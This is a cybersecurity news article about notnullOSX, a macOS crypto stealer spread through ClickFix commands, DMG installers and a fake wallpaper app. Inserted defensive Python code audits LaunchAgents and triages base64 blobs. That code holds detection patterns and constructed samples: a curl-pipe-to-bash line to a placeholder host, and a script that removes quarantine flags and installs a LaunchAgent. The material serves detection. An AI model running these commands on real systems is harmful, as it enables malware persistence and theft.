Hackers are abusing a fake macOS wallpaper app and a hijacked YouTube channel to quietly deliver notnullOSX, a new crypto-focused stealer that targets Macs via ClickFix commands and weaponized DMG installers.

The campaign is highly selective, going after victims with crypto holdings above 10,000 USD and using polished lures that closely mimic legitimate apps and workflows.

notnullOSX is linked to underground developer 0xFFF, who re-emerged under the alias “alh1mik” in 2024 after a notorious exit from the XSS cybercrime forum and promised a new, exclusive macOS stealer.

By early 2026, that promise materialized as a Go-based stealer with modular architecture, heavy obfuscation, and full backdoor-like capabilities.

Moonlock Lab telemetry first detected notnullOSX on March 30, 2026, in Vietnam, Taiwan, and Spain, indicating an active, ongoing campaign.

The operators use an affiliate panel to pre-screen targets by wallet value, only processing submissions where the cryptocurrency holdings exceed 10,000 USD, ensuring the tool is deployed against high-value macOS users.

This level of manual selection, along with detailed fields for social media, correspondence history, and wallet address, shows a hand-targeted, spear-phishing-style operation rather than mass spraying.

The infection begins with a fake “protected” Google document that displays an encryption error tied to a bogus “Google API Connector” issue and offers two “fix” paths, both of which deliver the same payload.

In the ClickFix chain, the page presents a base64-encoded Terminal command as the supposed remedy, betting on macOS users’ comfort with copying and pasting shell commands to resolve technical issues.

Decoding the command reveals a curl-based one-liner that pulls a bash installer from attacker-controlled infrastructure, which then downloads a Mach-O binary, removes Gatekeeper’s quarantine flag, wraps it into a hidden .app, and establishes persistence through a LaunchAgent.
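The LaunchAgent step above is the part of the chain that survives a reboot, so it is a natural place to hunt. The following is an added defender-side example (not code from the article or from Moonlock Lab): it parses LaunchAgent plists with the standard `plistlib` module and flags the traits an installer of this kind leaves behind, namely a program path with a hidden (dot-prefixed) directory component, a program living in a user-writable location, and RunAtLoad/KeepAlive. The two sample plists are constructed for the example; they are not recovered notnullOSX artifacts, and the paths and labels in them are placeholders.

```python
"""Hunt LaunchAgent plists for the persistence pattern described above.

Added example, not the article's or the malware's code. Sample plists are
constructed; the paths, labels and bundle names are placeholders.
"""
import plistlib
from pathlib import Path
from typing import Dict, List

# Locations an unprivileged user (or a script running as that user) can write to.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")

# Constructed samples: one mimicking a hidden .app under the home folder,
# one ordinary vendor agent installed under /Applications.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "com.example.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.helper</string>
    <key>ProgramArguments</key>
    <array><string>/Users/alice/Library/.wp/Helper.app/Contents/MacOS/Helper</string></array>
    <key>RunAtLoad</key><true/>
    <key>KeepAlive</key><true/>
</dict>
</plist>""",
    "com.vendor.sync.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.vendor.sync</string>
    <key>Program</key><string>/Applications/VendorSync.app/Contents/MacOS/VendorSync</string>
    <key>RunAtLoad</key><true/>
</dict>
</plist>""",
}


def program_path(plist: dict) -> str:
    """launchd accepts either Program or ProgramArguments[0] as the executable."""
    args = plist.get("ProgramArguments") or []
    return plist.get("Program") or (args[0] if args else "")


def audit(name: str, data: bytes) -> Dict[str, object]:
    """Parse one plist and return the traits worth a second look."""
    plist = plistlib.loads(data)
    path = program_path(plist)
    flags: List[str] = []
    # A dot-prefixed directory anywhere in the path hides the bundle from Finder.
    if any(part.startswith(".") for part in Path(path).parts if part not in (".", "..")):
        flags.append("hidden-path-component")
    if path.startswith(USER_WRITABLE_PREFIXES):
        flags.append("user-writable-location")
    if plist.get("RunAtLoad"):
        flags.append("run-at-load")
    if plist.get("KeepAlive"):
        flags.append("keep-alive")
    return {
        "file": name,
        "label": plist.get("Label", ""),
        "program": path,
        "flags": flags,
        # RunAtLoad alone is normal; a hidden or user-writable program is not.
        "suspicious": "hidden-path-component" in flags or "user-writable-location" in flags,
    }


def audit_samples() -> List[Dict[str, object]]:
    """Run the audit over the constructed samples (offline demo)."""
    return [audit(name, data) for name, data in SAMPLE_PLISTS.items()]


def scan_directory(directory: Path) -> List[Dict[str, object]]:
    """Audit a real LaunchAgents folder, e.g. Path.home() / 'Library/LaunchAgents'."""
    return [audit(p.name, p.read_bytes()) for p in sorted(directory.glob("*.plist"))]


if __name__ == "__main__":
    for finding in audit_samples():
        print(finding)
```

On a live Mac, `scan_directory(Path.home() / "Library/LaunchAgents")` and the same call on `/Library/LaunchAgents` cover the per-user and system-wide agent folders; findings marked `suspicious` are the ones to pull the referenced binary for, alongside its quarantine attribute and code signature.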

Victims are walked through granting Full Disk Access (FDA) in System Settings, effectively granting a blanket exception to macOS’s TCC privacy framework and allowing the implant to access Messages, Notes, Safari data, and more without further prompts.

This is not a TCC exploit; it is social engineering that convinces the user to hand over all sensitive data access in one step.

The second chain uses a malicious DMG that contains an Install.sh file, a README, and a Terminal alias, lowering the technical barrier by launching Terminal directly from the disk image instead of asking users to paste commands.

Install.sh appears as a large base64 blob; decoded, it runs a script that ultimately drops the same notnullOSX implant as the ClickFix path.
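Both delivery paths hinge on a base64 blob the user is asked to trust: the ClickFix page's encoded Terminal command and the DMG's Install.sh. The following is an added example of how to triage such a blob before it is ever executed; it is not code from the article, Moonlock Lab, or the malware. It peels base64 layers (including a blob embedded in an `echo ... | base64 -d` wrapper) and matches the decoded text against the indicators the article names: a remote script piped to a shell, quarantine-flag removal, a hidden .app path, and LaunchAgent installation. The three sample blobs are constructed for the example, with placeholder hostnames and paths, and are not campaign artifacts.

```python
"""Triage a ClickFix-style base64 "fix" command or Install.sh blob.

Added example, not the article's or the malware's code. All samples are
constructed; the hostname, paths and script contents are placeholders.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Each indicator corresponds to a step in the chain described in the article.
INDICATORS = {
    "remote-script-piped-to-shell": re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "quarantine-flag-removal": re.compile(r"\bxattr\b[^\n]*(?:com\.apple\.quarantine|\s-c\b)"),
    "launchagent-persistence": re.compile(r"LaunchAgents|\blaunchctl\s+(?:load|bootstrap)\b"),
    "hidden-app-bundle": re.compile(r"(?:^|/)\.[A-Za-z0-9_-]+(?:/|\.app\b)", re.M),
    "nested-base64-decode": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
}
# Long runs of base64 alphabet, as seen inside `echo <blob> | base64 -d | sh` wrappers.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _try_b64(text: str) -> Optional[str]:
    """Decode text as base64 if it is valid and yields printable UTF-8, else None."""
    compact = re.sub(r"\s+", "", text)  # blobs are often line-wrapped
    if len(compact) < 4:
        return None
    compact += "=" * (-len(compact) % 4)  # tolerate stripped padding
    try:
        decoded = base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\n\r\t" for ch in decoded):
        return None
    return decoded


def decode_layers(blob: str, max_layers: int = 4) -> List[str]:
    """Return decoded texts, outermost first, peeling nested blobs and embedded tokens."""
    layers: List[str] = []
    queue = [blob]
    while queue and len(layers) < max_layers:
        text = queue.pop(0)
        whole = _try_b64(text)
        if whole is not None:
            layers.append(whole)
            queue.append(whole)
            continue
        for token in B64_TOKEN.findall(text):
            inner = _try_b64(token)
            if inner is not None and inner not in layers:
                layers.append(inner)
                queue.append(inner)
    return layers


def triage(blob: str) -> Dict[str, object]:
    """Decode the blob and report which indicators its plaintext matches."""
    layers = decode_layers(blob)
    corpus = "\n".join(layers) if layers else blob
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(corpus))
    return {"layers": layers, "indicators": hits,
            "verdict": "block-and-report" if hits else "no-known-indicators"}


# Constructed samples (placeholder host and paths, nothing is fetched or run).
_OUTER_CMD = "curl -fsSL https://installer.example.invalid/setup.sh | bash"
SAMPLE_CLICKFIX = base64.b64encode(_OUTER_CMD.encode()).decode()

_INSTALLER_SCRIPT = """#!/bin/bash
# constructed stand-in for a dropped installer; intentionally inert
APP="$HOME/Library/.wp/Helper.app"
xattr -d com.apple.quarantine "$APP"
cp helper.plist "$HOME/Library/LaunchAgents/"
"""
_b64 = base64.b64encode(_INSTALLER_SCRIPT.encode()).decode()
SAMPLE_INSTALL_SH = "\n".join(_b64[i:i + 76] for i in range(0, len(_b64), 76))  # line-wrapped blob

SAMPLE_BENIGN = "ls -la ~/Downloads"

if __name__ == "__main__":
    for label, sample in (("clickfix", SAMPLE_CLICKFIX), ("install.sh", SAMPLE_INSTALL_SH), ("benign", SAMPLE_BENIGN)):
        print(label, triage(sample))
```

The verdict is deliberately conservative: any single indicator is enough to block, because a legitimate "fix" for a document viewer has no reason to strip quarantine flags or register a LaunchAgent. Feeding the decoded `layers` into a ticket rather than the raw blob also gives responders the download host to block at the proxy.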

On the delivery side, researchers observed a fake “WallSpace.app” posing as a legitimate macOS live wallpaper application, hosted on domains such as wallpapermacos[.]com and wallspaceapp[.]com.

The landing pages look professional, feature cinematic screenshots, and offer a “Download Free” button, while the download path itself triggers malware warnings from services like Cloudflare and is flagged as malicious on automated scanners.

One of these pages embeds a textbook ClickFix flow with a Terminal graphic, a base64-encoded command, and step-by-step instructions to “Open Terminal, Paste & Run, Pick a Wallpaper.”

Traffic to the fake wallpaper sites is funneled through a YouTube channel using the handle @wallspacemacos, which hosts a single video titled “WallSpace – Live Wallpaper for macOS” with around 50,000 views gained in roughly two weeks.

The channel itself dates back to 2015 but shows only 43 subscribers and one video, a pattern consistent with an older hijacked account repurposed for malware distribution and artificially promoted through paid ads or SEO manipulation.

The video description links directly to wallpapermacos[.]com, connecting the YouTube lure to the fake app download path.

By abusing a long-lived account with real historical metadata, the attackers gain implicit trust and bypass suspicion that would typically surround a brand-new channel pushing unknown macOS utilities.

A channel dormant for 10 years that suddenly publishes a single malware distribution video and accumulates 50,000 views in 2 weeks fits only one plausible explanation.

Once installed with Full Disk Access, notnullOSX runs as a multi-architecture Mach-O binary with modules downloaded on demand from a legitimate CDN (Filestack), each focused on a specific data category.

Confirmed modules include SystemInfo, iMessageGrab, AppleNotesGrab, SafariCookiesGrab, CryptoWalletsGrab, BrowserGrab, BrowserHistoryGrab, FirefoxGrab, CredsGrab, TelegramGrab, and ReplaceApp, giving operators broad reach into personal data, crypto assets, and developer credentials.

CryptoWalletsGrab targets both desktop wallets (e.g., Bitcoin Core, Electrum, Wasabi, Exodus, Atomic) and a hard-coded list of browser wallet extensions, copying raw data and IndexedDB vaults for offline abuse.

CredsGrab sweeps SSH keys, cloud provider credentials, and configuration files for platforms such as AWS, Azure, GCP, Kubernetes, Terraform, npm, and more, effectively turning a compromised Mac into a launchpad for lateral movement and software supply chain compromise.

ReplaceApp appears designed to swap legitimate hardware wallet management apps like Ledger Live or Trezor with trojanized versions, allowing attackers to intercept seed phrases during setup while preserving original icons to avoid user suspicion.


Mayura Kathir is a cybersecurity reporter at GBHackers News, covering daily incidents including data breaches, malware attacks, cybercrime, vulnerabilities, zero-day exploits, and more.
